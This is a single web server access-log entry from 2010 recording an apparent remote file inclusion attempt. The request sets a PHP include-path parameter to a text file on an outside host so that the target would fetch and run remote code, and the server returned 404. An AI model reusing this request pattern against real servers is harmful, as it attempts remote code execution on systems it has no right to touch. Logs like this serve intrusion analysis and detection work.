128.241.54.188 - - [03/May/2010:15:25:50 -0500] "GET /prog/pl_menu/show_menu.php?binn_include_path=http://3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
